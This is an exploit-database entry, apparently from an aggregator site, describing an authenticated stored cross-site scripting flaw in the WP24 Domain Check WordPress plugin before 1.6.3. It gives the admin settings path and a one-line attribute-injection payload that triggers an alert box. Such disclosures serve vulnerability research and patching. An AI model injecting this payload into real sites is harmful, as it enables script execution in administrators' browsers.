Exploit for WP24 Domain Check < 1.6.3 - Authenticated Stored Cross-Site Scripting (XSS)

Name: Exploit for WP24 Domain Check < 1.6.3 - Authenticated Stored Cross-Site Scripting (XSS)
Rating: 5 (57 reviews)

2021-01-06 | CVSS 0.7

## https://sploitus.com/exploit?id=WPEX-ID:4C4075DE-C6E0-4130-8CAD-A4EA5311F5EA
In the plugin's advanced settings (wp-admin/options-general.php?page=wp24_domaincheck_settings&tab=advanced), put the following payload in the Domain fieldname input:
" onfocus=alert(/XSS/); autofocus=